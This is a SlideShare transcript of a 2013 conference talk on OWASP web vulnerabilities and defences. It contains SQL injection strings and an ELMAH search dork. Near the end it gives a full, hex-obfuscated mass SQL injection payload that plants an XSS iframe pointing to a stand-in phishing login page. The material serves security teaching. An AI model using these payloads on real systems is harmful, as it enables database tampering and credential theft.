SlideShare a Scribd company logo

Top web apps security vulnerabilities

Download as PPTX, PDF
A
Aleksandar Bozinovski

My presentation about Web Apps security threats. Macedonian Code Camp conference 2013. “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis

Software
1 of 45
Top Web Apps Security Vulnerabilities Aleksandar Bozinovski Technical Lead, Seavus
Agenda Importance of Web Security HTTP, Sessions, Cookies Injection Cross Site Scripting (XSS) Cross-Site Request Forgery (CSRF) Security Misconfiguration Insecure Direct Object References
Famous Quote “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis Alan Jay Perlis was an computer scientist known for his pioneering work in programming languages, and is the first recipient of the Turing Award.
Bobby Tables string query="INSERT INTO Students VALUES ('"+txtName.Text+"','"+txtSSN.Text+"')"; //Attack: Robert’); DROP TABLE Students;-- INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')Robert'); DROP TABLE Students;--
Another one
Website Security Statistics
HTTP Hypertext Transport Protocol – Language of the Web. Protocol used for communication between web browsers and web servers – Standard RFC 1945, 1996 URL – Uniform Resource Identifier Methods – GET, POST, PUT, HEAD, OPTIONS
Statelessness, Cookies  In its nature HTTP it is said to be a stateless protocol. – i.e. from one web page to the next there is nothing in the protocol that allows a web program to maintain program “state” (like a desktop program). – “state” can be maintained by “witchery” or “trickery” if it is needed.  Cookie – piece of data sent from a website and stored in a user's web browser while a user is browsing a website. – The Server sets the cookie in a response. – The client includes the cookies in the Http header for subsequent requests to the server. – Example Cookie: ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr
Session Cookie Hijacking
OWASP Top 10
Injection OWASP Definition – Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
Injection Characteristics
SQL Injection Happens when we create query but we fail to validate and sanitize untrusted input data.
Queries constructed with concatenating strings are vulnerable to SQL Injection. SQL Queries var categoryId = Request.QueryString["CategoryId"]; var sql = "SELECT * FROM Products WHERE CategoryID=" + categoryId; // If we enter "7 OR 1=1" in query string we end up with: SELECT * FROM Products WHERE CategoryID=7 OR 1=1 // Attacker can use ; to terminate current command and run its own commands. SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products
Validate untrusted data. If input data is supposed to be number, convert it to number or check it with regex. Use parameterized SQL queries instead of strings soup. – Using stored procedures is also a good idea but keep in mind that stored procedures are vulnerable if they concatenate strings on their own. Use ORMs (like Entity Framework) that are inherently resistant to SQL Injection. Prevent SQL Injection
Other Injection Attacks LDAP Injection – string ldapSearch = "(cn=" + txtSearchTerm.Text + ")"; Dynamic LINQ Injection – string where = “Table.Contains("" + search + "")"; XPATH Injection – string loginExpression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
Cross-Site Scripting (XSS) OWASP Definition – XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
XSS Characteristics
Types of XSS Attacks Stored XSS • Stored attacks are those where the injected code is permanently stored on the target servers. • Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. Reflected XSS • Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result. • Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server.
Built-in protection Modern browsers and servers employ many first line defenses against XSS by default: – ASP.NET Request Validation, present since version 2.0. In ASP.NET 4.0 it is enabled for all types of requests not just pages. To be turned off we must revert to the older mode requestValidationMode="2.0“ – Output encoding. MVC Razor view engine encodes everything by default. XSS is possible only if we use @Html.Raw()
Built-in protection – AntiXSS library is by default included in ASP.NET Web Forms 4.5. Can be retrofitted on older web apps. – Google Chrome has built-in anti XSS protection
Cross-Site Request Forgery OWASP Definition – A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
CSRF Characteristics
How CSRF works  Authenticated sessions are persisted via cookies The cookie is sent with every request to the domain  The attacking site recreates a legitimately formed request to the target site Although the request has a malicious payload (query string parameters or post data)  The victim’s browser is tricked into issuing the request For all intents and purposes, the target website views it as a legitimate request
CSRF Tokens  To mitigate this risk, we can add randomness via a CSRF token  A token is a random string known to both the legitimate page where the form is and to the browser via a cookie
Security Misconfiguration OWASP Definition – Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
Characteristics
Keep up to date Your servers – Windows Server 2012 is arguably more secure than Windows Server 2003 Client browsers (if applicable) – Modern browsers include built-in defenses against most prevalent attacks Keep your frameworks up to date
Set Custom Errors, hide YSOD
Turn Off Tracing
Also don’t forget to turn off ELMAH – Cases with unprotected ELMAH handlers are notorious. – Googledork: inurl:”elmah.axd” DEBUG – Performance penalties – Although not related with direct security risks on its own beware of #if DEBUG statements that can disclose information
Also don’t forget to turn off Script execution on folders where not needed – Usually folders where various documents or uploaded files are kept, unless you use App_Data folder. HTTP Access to Logs – Log files can disclose many sensitive details about your web app. It’s best to keep them outside of the web app root. If not possible at least keep them in App_Data.
Insecure Direct Object References OWASP Definition – A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
Characteristics
Direct Object References – A direct object reference is an observable key used to identify an individual record in database • http://northwind.com/Products?catId=1 • http://northwind.com/Products?catId=3 • http://northwind.com/Products?catId=8
Direct Object References – Another example • http://webapp.com/Download?f=DSC01031.JPG • http://webapp.com/Download?f=DSC01032.JPG • http://webapp.com/Download?f=DSC01033.JPG
Prevention Implementing proper access control – Validate user data – Implement security checks before using object reference Access via undiscoverable surrogate keys – Integer and natural string types are vulnerable to enumeration – A surrogate key that is not pattern-based can add further obfuscation • A GUID is a good example – However, it is security through obscurity
Real example: phishing with obfuscated SQL injection and XSS --1. The malicious query appends script to all text values in all tables in the database DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like '%username%' and b.name not like '%password%' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + '' <script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;z- index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like ''%http://codecamp.local/EvilSite/Login.aspx%'''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Real example : phishing with obfuscated SQL injection and XSS --2. The query is wrtten as one line string 'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z- index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' --3. We cast the query string as varbinary to obfuscate the XSS attack and to bypass XSS filters. SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z- index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX)) -- result: 0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563 7420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D27752 720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F74206C 696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E45585420 46524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B40542B27 5D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C64697620 7374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223E3C69 6672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707 822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B272B40 432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E4558542046524F 4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 --4. Final attack is: a' OR 1=1; DECLARE @S CHAR(4000);SET @S = CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D 27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F7 4206C696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E455 8542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B405 42B275D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C646 976207374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223 E3C696672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E61 73707822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B2 72B40432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as CHAR(4000));EXEC(@S)--
Questions?
• Complete electronic evaluation forms on the computers in the hall and enter to win! – Infragistics Ultimate – Telerik DevCraft – JetBrains .NET tools – Semos training vouchers – Pluralsight subscriptions – and many more…
Top web apps security vulnerabilities

Recommended

Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeMicrosoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeAleksandar Bozinovski
 
ASP.NET security vulnerabilities
ASP.NET security vulnerabilitiesASP.NET security vulnerabilities
ASP.NET security vulnerabilitiesAleksandar Bozinovski
 
Background processing with hangfire
Background processing with hangfireBackground processing with hangfire
Background processing with hangfireAleksandar Bozinovski
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)Sam Bowne
 
How to Build Your Own Test Automation Framework?
How to Build Your Own Test Automation Framework?How to Build Your Own Test Automation Framework?
How to Build Your Own Test Automation Framework?Dmitry Buzdin
 
Continuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanContinuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanCypress Data Defense
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionPaul Ionescu
 

Recommended

Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeMicrosoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeAleksandar Bozinovski
 
ASP.NET security vulnerabilities
ASP.NET security vulnerabilitiesASP.NET security vulnerabilities
ASP.NET security vulnerabilitiesAleksandar Bozinovski
 
Background processing with hangfire
Background processing with hangfireBackground processing with hangfire
Background processing with hangfireAleksandar Bozinovski
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)Sam Bowne
 
How to Build Your Own Test Automation Framework?
How to Build Your Own Test Automation Framework?How to Build Your Own Test Automation Framework?
How to Build Your Own Test Automation Framework?Dmitry Buzdin
 
Continuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanContinuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanCypress Data Defense
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionPaul Ionescu
 
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsSam Bowne
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)Sam Bowne
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Christian Schneider
 
Automated Security Testing
Automated Security TestingAutomated Security Testing
Automated Security Testingseleniumconf
 
Hacker Proof web app using Functional tests
Hacker Proof web app using Functional testsHacker Proof web app using Functional tests
Hacker Proof web app using Functional testsAnkita Gupta
 
Delivery Pipeline for Windows Machines
Delivery Pipeline for Windows MachinesDelivery Pipeline for Windows Machines
Delivery Pipeline for Windows MachinesDmitry Buzdin
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)Sam Bowne
 
How to grow your own Microservice?
How to grow your own Microservice?How to grow your own Microservice?
How to grow your own Microservice?Dmitry Buzdin
 
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Christian Schneider
 
Continuous Security Testing with Devops - OWASP EU 2014
Continuous Security Testing with Devops - OWASP EU 2014Continuous Security Testing with Devops - OWASP EU 2014
Continuous Security Testing with Devops - OWASP EU 2014Stephen de Vries
 
Unit Testing in Swift
Unit Testing in SwiftUnit Testing in Swift
Unit Testing in SwiftGlobalLogic Ukraine
 
Practice of AppSec .NET
Practice of AppSec .NETPractice of AppSec .NET
Practice of AppSec .NETMikhail Shcherbakov
 
Just Enough Threat Modeling
Just Enough Threat ModelingJust Enough Threat Modeling
Just Enough Threat ModelingStephen de Vries
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomationLinkesh Kanna Velu
 
Security Model in .NET Framework
Security Model in .NET FrameworkSecurity Model in .NET Framework
Security Model in .NET FrameworkMikhail Shcherbakov
 
An introduction to unit testing
An introduction to unit testingAn introduction to unit testing
An introduction to unit testingAdam Stephensen
 
Javacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 SpeechJavacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 SpeechFernando Redondo Ramírez
 
Test your microservices with REST-Assured
Test your microservices with REST-AssuredTest your microservices with REST-Assured
Test your microservices with REST-AssuredMichel Schudel
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 
proposal penelitian rajab
proposal penelitian rajabproposal penelitian rajab
proposal penelitian rajabRoma Dhani Rajab
 
Quality Coding: What's New with Visual Studio 2012
Quality Coding: What's New with Visual Studio 2012Quality Coding: What's New with Visual Studio 2012
Quality Coding: What's New with Visual Studio 2012Imaginet
 

More Related Content

What's hot

CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsSam Bowne
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)Sam Bowne
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Christian Schneider
 
Automated Security Testing
Automated Security TestingAutomated Security Testing
Automated Security Testingseleniumconf
 
Hacker Proof web app using Functional tests
Hacker Proof web app using Functional testsHacker Proof web app using Functional tests
Hacker Proof web app using Functional testsAnkita Gupta
 
Delivery Pipeline for Windows Machines
Delivery Pipeline for Windows MachinesDelivery Pipeline for Windows Machines
Delivery Pipeline for Windows MachinesDmitry Buzdin
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)Sam Bowne
 
How to grow your own Microservice?
How to grow your own Microservice?How to grow your own Microservice?
How to grow your own Microservice?Dmitry Buzdin
 
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Christian Schneider
 
Continuous Security Testing with Devops - OWASP EU 2014
Continuous Security Testing with Devops - OWASP EU 2014Continuous Security Testing with Devops - OWASP EU 2014
Continuous Security Testing with Devops - OWASP EU 2014Stephen de Vries
 
Just Enough Threat Modeling
Just Enough Threat ModelingJust Enough Threat Modeling
Just Enough Threat ModelingStephen de Vries
 
Security Model in .NET Framework
Security Model in .NET FrameworkSecurity Model in .NET Framework
Security Model in .NET FrameworkMikhail Shcherbakov
 
An introduction to unit testing
An introduction to unit testingAn introduction to unit testing
An introduction to unit testingAdam Stephensen
 
Test your microservices with REST-Assured
Test your microservices with REST-AssuredTest your microservices with REST-Assured
Test your microservices with REST-AssuredMichel Schudel
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 

What's hot (20)

CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
 
Automated Security Testing
Automated Security TestingAutomated Security Testing
Automated Security Testing
 
Hacker Proof web app using Functional tests
Hacker Proof web app using Functional testsHacker Proof web app using Functional tests
Hacker Proof web app using Functional tests
 
Delivery Pipeline for Windows Machines
Delivery Pipeline for Windows MachinesDelivery Pipeline for Windows Machines
Delivery Pipeline for Windows Machines
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
 
How to grow your own Microservice?
How to grow your own Microservice?How to grow your own Microservice?
How to grow your own Microservice?
 
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
 
Continuous Security Testing with Devops - OWASP EU 2014
Continuous Security Testing with Devops - OWASP EU 2014Continuous Security Testing with Devops - OWASP EU 2014
Continuous Security Testing with Devops - OWASP EU 2014
 
Unit Testing in Swift
Unit Testing in SwiftUnit Testing in Swift
Unit Testing in Swift
 
Practice of AppSec .NET
Practice of AppSec .NETPractice of AppSec .NET
Practice of AppSec .NET
 
Just Enough Threat Modeling
Just Enough Threat ModelingJust Enough Threat Modeling
Just Enough Threat Modeling
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomation
 
Security Model in .NET Framework
Security Model in .NET FrameworkSecurity Model in .NET Framework
Security Model in .NET Framework
 
An introduction to unit testing
An introduction to unit testingAn introduction to unit testing
An introduction to unit testing
 
Javacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 SpeechJavacro 2014 Spring Security 3 Speech
Javacro 2014 Spring Security 3 Speech
 
Test your microservices with REST-Assured
Test your microservices with REST-AssuredTest your microservices with REST-Assured
Test your microservices with REST-Assured
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...
 

Viewers also liked

Quality Coding: What's New with Visual Studio 2012
Quality Coding: What's New with Visual Studio 2012Quality Coding: What's New with Visual Studio 2012
Quality Coding: What's New with Visual Studio 2012Imaginet
 
AQ Overview Brochure
AQ Overview BrochureAQ Overview Brochure
AQ Overview BrochureAaron Moore
 
Analiza porównawcza i prognoza dynamiki
Analiza porównawcza i prognoza dynamikiAnaliza porównawcza i prognoza dynamiki
Analiza porównawcza i prognoza dynamikiwneku1995
 
Business Cert_Crystal Roseth
Business Cert_Crystal RosethBusiness Cert_Crystal Roseth
Business Cert_Crystal RosethCrystal Roseth
 
Ausflüge Teil 1. Ukraine
Ausflüge Teil 1. UkraineAusflüge Teil 1. Ukraine
Ausflüge Teil 1. UkraineSvetlana Kruk
 
TUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANG
TUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANGTUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANG
TUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANGdinhnguyenvn
 
Posisi Ilmu Administrasi Negara Dengan Ilmu Sosial Lainnya
Posisi Ilmu Administrasi Negara Dengan Ilmu Sosial LainnyaPosisi Ilmu Administrasi Negara Dengan Ilmu Sosial Lainnya
Posisi Ilmu Administrasi Negara Dengan Ilmu Sosial Lainnyavirmannsyah
 
The Newest of the New with Visual Studio and TFS 2012
The Newest of the New with Visual Studio and TFS 2012The Newest of the New with Visual Studio and TFS 2012
The Newest of the New with Visual Studio and TFS 2012Imaginet
 
Introduction to Kanban
Introduction to KanbanIntroduction to Kanban
Introduction to KanbanImaginet
 
HEALTH MONITORING SYSTEM using mbed NXP LPC11U24
HEALTH MONITORING SYSTEM using mbed NXP LPC11U24HEALTH MONITORING SYSTEM using mbed NXP LPC11U24
HEALTH MONITORING SYSTEM using mbed NXP LPC11U24Jigyasa Singh
 
Digital Enterprise: Industry 4.0
Digital Enterprise: Industry 4.0Digital Enterprise: Industry 4.0
Digital Enterprise: Industry 4.0Ali Riza ERSOY
 
Industry 4.0 Changes Everything
Industry 4.0 Changes Everything Industry 4.0 Changes Everything
Industry 4.0 Changes Everything Imaginet
 
Statistik Pengguna Internet Indonesia 2016
Statistik Pengguna Internet Indonesia 2016Statistik Pengguna Internet Indonesia 2016
Statistik Pengguna Internet Indonesia 2016Ari Fadyl
 
AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014
AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014
AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014University of Minnesota
 

Viewers also liked (17)

proposal penelitian rajab
proposal penelitian rajabproposal penelitian rajab
proposal penelitian rajab
 
Quality Coding: What's New with Visual Studio 2012
Quality Coding: What's New with Visual Studio 2012Quality Coding: What's New with Visual Studio 2012
Quality Coding: What's New with Visual Studio 2012
 
AQ Overview Brochure
AQ Overview BrochureAQ Overview Brochure
AQ Overview Brochure
 
Lectura 3
Lectura 3Lectura 3
Lectura 3
 
M.Mustafa Elsayed Last Updated CV
M.Mustafa Elsayed Last Updated CVM.Mustafa Elsayed Last Updated CV
M.Mustafa Elsayed Last Updated CV
 
Analiza porównawcza i prognoza dynamiki
Analiza porównawcza i prognoza dynamikiAnaliza porównawcza i prognoza dynamiki
Analiza porównawcza i prognoza dynamiki
 
Business Cert_Crystal Roseth
Business Cert_Crystal RosethBusiness Cert_Crystal Roseth
Business Cert_Crystal Roseth
 
Ausflüge Teil 1. Ukraine
Ausflüge Teil 1. UkraineAusflüge Teil 1. Ukraine
Ausflüge Teil 1. Ukraine
 
TUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANG
TUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANGTUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANG
TUYEN TAP CAC CAU HOI TU LUAN THI VAO NGAN HANG
 
Posisi Ilmu Administrasi Negara Dengan Ilmu Sosial Lainnya
Posisi Ilmu Administrasi Negara Dengan Ilmu Sosial LainnyaPosisi Ilmu Administrasi Negara Dengan Ilmu Sosial Lainnya
Posisi Ilmu Administrasi Negara Dengan Ilmu Sosial Lainnya
 
The Newest of the New with Visual Studio and TFS 2012
The Newest of the New with Visual Studio and TFS 2012The Newest of the New with Visual Studio and TFS 2012
